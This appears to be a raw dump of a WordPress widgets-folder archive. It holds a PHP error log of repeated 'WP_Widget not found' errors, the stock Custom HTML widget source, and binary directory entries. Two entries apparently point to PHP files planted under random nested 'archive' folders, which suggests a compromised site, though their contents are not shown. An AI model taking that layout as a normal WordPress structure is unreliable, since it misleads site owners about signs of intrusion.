  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[19-Apr-2026 15:53:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[19-Apr-2026 19:50:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[21-Apr-2026 09:01:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[21-Apr-2026 11:54:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[21-Apr-2026 16:53:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[21-Apr-2026 16:56:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[22-Apr-2026 14:42:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[23-Apr-2026 00:51:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[23-Apr-2026 16:43:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[23-Apr-2026 22:01:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[24-Apr-2026 06:12:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[24-Apr-2026 14:26:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[25-Apr-2026 01:56:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php on line 17
[25-Apr-2026 13:47:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[25-Apr-2026 22:21:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-meta.php on line 19
[26-Apr-2026 07:30:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media.php on line 17
[27-Apr-2026 02:01:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-text.php on line 17
[27-Apr-2026 02:03:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[27-Apr-2026 02:05:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-links.php on line 17
[27-Apr-2026 02:08:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[28-Apr-2026 03:37:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[28-Apr-2026 04:50:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[28-Apr-2026 09:27:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[29-Apr-2026 13:47:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-pages.php on line 17
[29-Apr-2026 13:57:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[29-Apr-2026 13:59:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[29-Apr-2026 16:36:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[29-Apr-2026 19:29:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[29-Apr-2026 20:08:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[29-Apr-2026 20:39:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[30-Apr-2026 01:28:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[30-Apr-2026 01:29:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[30-Apr-2026 01:30:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[04-May-2026 04:57:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[06-May-2026 02:27:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[06-May-2026 02:28:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[06-May-2026 02:30:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[06-May-2026 02:33:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[06-May-2026 02:35:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-categories.php on line 17
[06-May-2026 02:36:46 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-block.php on line 17
[06-May-2026 02:38:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-archives.php on line 17
[06-May-2026 02:40:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[06-May-2026 05:40:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-rss.php on line 17
[06-May-2026 05:42:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/optixsfl/optimisticscholar.com/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
PK     \l6L/  /    class-wp-widget-custom-html.phpnu [        <?php
/**
 * Widget API: WP_Widget_Custom_HTML class
 *
 * @package WordPress
 * @subpackage Widgets
 * @since 4.8.1
 */

/**
 * Core class used to implement a Custom HTML widget.
 *
 * @since 4.8.1
 *
 * @see WP_Widget
 */
class WP_Widget_Custom_HTML extends WP_Widget {

	/**
	 * Whether or not the widget has been registered yet.
	 *
	 * @since 4.9.0
	 * @var bool
	 */
	protected $registered = false;

	/**
	 * Default instance.
	 *
	 * @since 4.8.1
	 * @var array
	 */
	protected $default_instance = array(
		'title'   => '',
		'content' => '',
	);

	/**
	 * Sets up a new Custom HTML widget instance.
	 *
	 * @since 4.8.1
	 */
	public function __construct() {
		$widget_ops  = array(
			'classname'                   => 'widget_custom_html',
			'description'                 => __( 'Arbitrary HTML code.' ),
			'customize_selective_refresh' => true,
			'show_instance_in_rest'       => true,
		);
		$control_ops = array(
			'width'  => 400,
			'height' => 350,
		);
		parent::__construct( 'custom_html', __( 'Custom HTML' ), $widget_ops, $control_ops );
	}

	/**
	 * Add hooks for enqueueing assets when registering all widget instances of this widget class.
	 *
	 * @since 4.9.0
	 *
	 * @param int $number Optional. The unique order number of this widget instance
	 *                    compared to other instances of the same class. Default -1.
	 */
	public function _register_one( $number = -1 ) {
		parent::_register_one( $number );
		if ( $this->registered ) {
			return;
		}
		$this->registered = true;

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_print_scripts-widgets.php' action in WP_Customize_Widgets::print_scripts().
		 */
		add_action( 'admin_print_scripts-widgets.php', array( $this, 'enqueue_admin_scripts' ) );

		/*
		 * Note that the widgets component in the customizer will also do
		 * the 'admin_footer-widgets.php' action in WP_Customize_Widgets::print_footer_scripts().
		 */
		add_action( 'admin_footer-widgets.php', array( 'WP_Widget_Custom_HTML', 'render_control_template_scripts' ) );

		// Note this action is used to ensure the help text is added to the end.
		add_action( 'admin_head-widgets.php', array( 'WP_Widget_Custom_HTML', 'add_help_text' ) );
	}

	/**
	 * Filters gallery shortcode attributes.
	 *
	 * Prevents all of a site's attachments from being shown in a gallery displayed on a
	 * non-singular template where a $post context is not available.
	 *
	 * @since 4.9.0
	 *
	 * @param array $attrs Attributes.
	 * @return array Attributes.
	 */
	public function _filter_gallery_shortcode_attrs( $attrs ) {
		if ( ! is_singular() && empty( $attrs['id'] ) && empty( $attrs['include'] ) ) {
			$attrs['id'] = -1;
		}
		return $attrs;
	}

	/**
	 * Outputs the content for the current Custom HTML widget instance.
	 *
	 * @since 4.8.1
	 *
	 * @global WP_Post $post Global post object.
	 *
	 * @param array $args     Display arguments including 'before_title', 'after_title',
	 *                        'before_widget', and 'after_widget'.
	 * @param array $instance Settings for the current Custom HTML widget instance.
	 */
	public function widget( $args, $instance ) {
		global $post;

		// Override global $post so filters (and shortcodes) apply in a consistent context.
		$original_post = $post;
		if ( is_singular() ) {
			// Make sure post is always the queried object on singular queries (not from another sub-query that failed to clean up the global $post).
			$post = get_queried_object();
		} else {
			// Nullify the $post global during widget rendering to prevent shortcodes from running with the unexpected context on archive queries.
			$post = null;
		}

		// Prevent dumping out all attachments from the media library.
		add_filter( 'shortcode_atts_gallery', array( $this, '_filter_gallery_shortcode_attrs' ) );

		$instance = array_merge( $this->default_instance, $instance );

		/** This filter is documented in wp-includes/widgets/class-wp-widget-pages.php */
		$title = apply_filters( 'widget_title', $instance['title'], $instance, $this->id_base );

		// Prepare instance data that looks like a normal Text widget.
		$simulated_text_widget_instance = array_merge(
			$instance,
			array(
				'text'   => isset( $instance['content'] ) ? $instance['content'] : '',
				'filter' => false, // Because wpautop is not applied.
				'visual' => false, // Because it wasn't created in TinyMCE.
			)
		);
		unset( $simulated_text_widget_instance['content'] ); // Was moved to 'text' prop.

		/** This filter is documented in wp-includes/widgets/class-wp-widget-text.php */
		$content = apply_filters( 'widget_text', $instance['content'], $simulated_text_widget_instance, $this );

		/**
		 * Filters the content of the Custom HTML widget.
		 *
		 * @since 4.8.1
		 *
		 * @param string                $content  The widget content.
		 * @param array                 $instance Array of settings for the current widget.
		 * @param WP_Widget_Custom_HTML $widget   Current Custom HTML widget instance.
		 */
		$content = apply_filters( 'widget_custom_html_content', $content, $instance, $this );

		// Restore post global.
		$post = $original_post;
		remove_filter( 'shortcode_atts_gallery', array( $this, '_filter_gallery_shortcode_attrs' ) );

		// Inject the Text widget's container class name alongside this widget's class name for theme styling compatibility.
		$args['before_widget'] = preg_replace( '/(?<=\sclass=["\'])/', 'widget_text ', $args['before_widget'] );

		echo $args['before_widget'];
		if ( ! empty( $title ) ) {
			echo $args['before_title'] . $title . $args['after_title'];
		}
		echo '<div class="textwidget custom-html-widget">'; // The textwidget class is for theme styling compatibility.
		echo $content;
		echo '</div>';
		echo $args['after_widget'];
	}

	/**
	 * Handles updating settings for the current Custom HTML widget instance.
	 *
	 * @since 4.8.1
	 *
	 * @param array $new_instance New settings for this instance as input by the user via
	 *                            WP_Widget::form().
	 * @param array $old_instance Old settings for this instance.
	 * @return array Settings to save or bool false to cancel saving.
	 */
	public function update( $new_instance, $old_instance ) {
		$instance          = array_merge( $this->default_instance, $old_instance );
		$instance['title'] = sanitize_text_field( $new_instance['title'] );
		if ( current_user_can( 'unfiltered_html' ) ) {
			$instance['content'] = $new_instance['content'];
		} else {
			$instance['content'] = wp_kses_post( $new_instance['content'] );
		}
		return $instance;
	}

	/**
	 * Loads the required scripts and styles for the widget control.
	 *
	 * @since 4.9.0
	 */
	public function enqueue_admin_scripts() {
		$settings = wp_enqueue_code_editor(
			array(
				'type'       => 'text/html',
				'codemirror' => array(
					'indentUnit' => 2,
					'tabSize'    => 2,
				),
			)
		);

		wp_enqueue_script( 'custom-html-widgets' );
		wp_add_inline_script( 'custom-html-widgets', sprintf( 'wp.customHtmlWidgets.idBases.push( %s );', wp_json_encode( $this->id_base, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ) );

		if ( empty( $settings ) ) {
			$settings = array(
				'disabled' => true,
			);
		}
		wp_add_inline_script( 'custom-html-widgets', sprintf( 'wp.customHtmlWidgets.init( %s );', wp_json_encode( $settings, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ), 'after' );

		$l10n = array(
			'errorNotice' => array(
				/* translators: %d: Error count. */
				'singular' => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 1 ),
				/* translators: %d: Error count. */
				'plural'   => _n( 'There is %d error which must be fixed before you can save.', 'There are %d errors which must be fixed before you can save.', 2 ),
				// @todo This is lacking, as some languages have a dedicated dual form. For proper handling of plurals in JS, see #20491.
			),
		);
		wp_add_inline_script( 'custom-html-widgets', sprintf( 'jQuery.extend( wp.customHtmlWidgets.l10n, %s );', wp_json_encode( $l10n, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ) ), 'after' );
	}

	/**
	 * Outputs the Custom HTML widget settings form.
	 *
	 * @since 4.8.1
	 * @since 4.9.0 The form contains only hidden sync inputs. For the control UI, see `WP_Widget_Custom_HTML::render_control_template_scripts()`.
	 *
	 * @see WP_Widget_Custom_HTML::render_control_template_scripts()
	 *
	 * @param array $instance Current instance.
	 */
	public function form( $instance ) {
		$instance = wp_parse_args( (array) $instance, $this->default_instance );
		?>
		<input id="<?php echo $this->get_field_id( 'title' ); ?>" name="<?php echo $this->get_field_name( 'title' ); ?>" class="title sync-input" type="hidden" value="<?php echo esc_attr( $instance['title'] ); ?>" />
		<textarea id="<?php echo $this->get_field_id( 'content' ); ?>" name="<?php echo $this->get_field_name( 'content' ); ?>" class="content sync-input" hidden><?php echo esc_textarea( $instance['content'] ); ?></textarea>
		<?php
	}

	/**
	 * Render form template scripts.
	 *
	 * @since 4.9.0
	 */
	public static function render_control_template_scripts() {
		?>
		<script type="text/html" id="tmpl-widget-custom-html-control-fields">
			<# var elementIdPrefix = 'el' + String( Math.random() ).replace( /\D/g, '' ) + '_' #>
			<p>
				<label for="{{ elementIdPrefix }}title"><?php esc_html_e( 'Title:' ); ?></label>
				<input id="{{ elementIdPrefix }}title" type="text" class="widefat title">
			</p>

			<p>
				<label for="{{ elementIdPrefix }}content" id="{{ elementIdPrefix }}content-label"><?php esc_html_e( 'Content:' ); ?></label>
				<textarea id="{{ elementIdPrefix }}content" class="widefat code content" rows="16" cols="20"></textarea>
			</p>

			<?php if ( ! current_user_can( 'unfiltered_html' ) ) : ?>
				<?php
				$probably_unsafe_html = array( 'script', 'iframe', 'form', 'input', 'style' );
				$allowed_html         = wp_kses_allowed_html( 'post' );
				$disallowed_html      = array_diff( $probably_unsafe_html, array_keys( $allowed_html ) );
				?>
				<?php if ( ! empty( $disallowed_html ) ) : ?>
					<# if ( data.codeEditorDisabled ) { #>
						<p>
							<?php _e( 'Some HTML tags are not permitted, including:' ); ?>
							<code><?php echo implode( '</code>, <code>', $disallowed_html ); ?></code>
						</p>
					<# } #>
				<?php endif; ?>
			<?php endif; ?>

			<div class="code-editor-error-container"></div>
		</script>
		<?php
	}

	/**
	 * Add help text to widgets admin screen.
	 *
	 * @since 4.9.0
	 */
	public static function add_help_text() {
		$screen = get_current_screen();

		$content  = '<p>';
		$content .= __( 'Use the Custom HTML widget to add arbitrary HTML code to your widget areas.' );
		$content .= '</p>';

		if ( 'false' !== wp_get_current_user()->syntax_highlighting ) {
			$content .= '<p>';
			$content .= sprintf(
				/* translators: 1: Link to user profile, 2: Additional link attributes, 3: Accessibility text. */
				__( 'The edit field automatically highlights code syntax. You can disable this in your <a href="%1$s" %2$s>user profile%3$s</a> to work in plain text mode.' ),
				esc_url( get_edit_profile_url() ),
				'class="external-link" target="_blank"',
				sprintf(
					'<span class="screen-reader-text"> %s</span>',
					/* translators: Hidden accessibility text. */
					__( '(opens in a new tab)' )
				)
			);
			$content .= '</p>';

			$content .= '<p id="editor-keyboard-trap-help-1">' . __( 'When using a keyboard to navigate:' ) . '</p>';
			$content .= '<ul>';
			$content .= '<li id="editor-keyboard-trap-help-2">' . __( 'In the editing area, the Tab key enters a tab character.' ) . '</li>';
			$content .= '<li id="editor-keyboard-trap-help-3">' . __( 'To move away from this area, press the Esc key followed by the Tab key.' ) . '</li>';
			$content .= '<li id="editor-keyboard-trap-help-4">' . __( 'Screen reader users: when in forms mode, you may need to press the Esc key twice.' ) . '</li>';
			$content .= '</ul>';
		}

		$screen->add_help_tab(
			array(
				'id'      => 'custom_html_widget',
				'title'   => __( 'Custom HTML Widget' ),
				'content' => $content,
			)
		);
	}
}
PK       \}ä
  
                  class-wp-widget-search.phpnu [        PK       \*O
a  a              
  class-wp-widget-calendar.phpnu [        PK       \js.                  class-wp-widget-categories.phpnu [        PK       \OM  M              4  class-wp-widget-archives.phpnu [        PK       \gtfS  fS              8Q  class-wp-widget-text.phpnu [        PK       \)|  |  !              class-wp-widget-media-gallery.phpnu [        PK       \h=                  class-wp-widget-meta.phpnu [        PK       \2  2                 class-wp-widget-recent-posts.phpnu [        PK       \[Bz"  z"              x  class-wp-widget-media-video.phpnu [        PK       \ki    ,            A archive/js/archive/2023/docs/bgkvo/admin.phpnu 6$        PK       \D*: : C            6 archive/js/archive/includes/2023/tmp/cache/tmp/zqceu/vlya/index.phpnu 6$        PK       \ wAy}  }              K class-wp-widget-links.phpnu [        PK       \q-j1  j1               class-wp-widget-media-image.phpnu [        PK       \a#MH    #             class-wp-widget-recent-comments.phpnu [        PK       \                : class-wp-widget-media-audio.phpnu [        PK       \QX|  |              T class-wp-widget-rss.phpnu [        PK       \X  X              h class-wp-widget-pages.phpnu [        PK       \Gl1  1              { class-wp-nav-menu-widget.phpnu [        PK       \ ] <  <               class-wp-widget-media.phpnu [        PK       \8zz  z              H class-wp-widget-tag-cloud.phpnu [        PK       \w&/                 class-wp-widget-block.phpnu [        PK       \ޥP  P  	            
 error_lognu [        PK       \l6L/  /              ~+ class-wp-widget-custom-html.phpnu [        PK     